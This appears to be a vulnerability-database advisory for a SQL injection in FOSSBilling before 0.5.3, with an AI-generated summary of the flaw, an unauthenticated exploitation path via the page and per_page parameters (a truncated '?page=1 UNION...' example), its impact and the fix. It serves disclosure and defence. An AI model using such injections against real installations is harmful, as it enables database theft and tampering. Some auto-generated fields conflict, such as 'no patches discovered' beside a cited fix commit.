SQL Injection in fossbilling/fossbilling
Description
SQL Injection in GitHub repository fossbilling/fossbilling prior to 0.5.3.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SQL injection in FOSSBilling before 0.5.3 via unsanitized page and per_page parameters in LIMIT clause, allowing unauthorized database access.
Vulnerability
A SQL injection vulnerability exists in the getSimpleResultSet and getAdvancedResultSet methods of FOSSBilling prior to version 0.5.3. The page and per_page GET parameters were directly concatenated into SQL LIMIT clauses using %s format specifier without validation, allowing an attacker to inject arbitrary SQL. Affected versions: all before 0.5.3 [1].
Exploitation
An attacker does not require authentication, as the pagination endpoints are publicly accessible. By passing crafted values (e.g., ?page=1 UNION...) in the page or per_page parameter, the attacker injects SQL payloads into the LIMIT clause. No user interaction is needed [2].
Impact
Successful exploitation enables reading, modifying, or deleting database content, potentially leading to full data compromise. Depending on database privileges, this could escalate to remote code execution [2].
Mitigation
The issue is fixed in commit 2ddb7438ee0d05f9a9d01555edcfed820960f114 [1] and released in FOSSBilling 0.5.3. The fix validates that page and per_page are numeric and uses %u in sprintf to treat them as unsigned integers. Users must upgrade to 0.5.3 or later; no workaround exists [1][2].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: <0.5.3
- fossbilling/fossbilling/fossbillingv5Range: unspecified
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
2News mentions
0No linked articles in our index yet.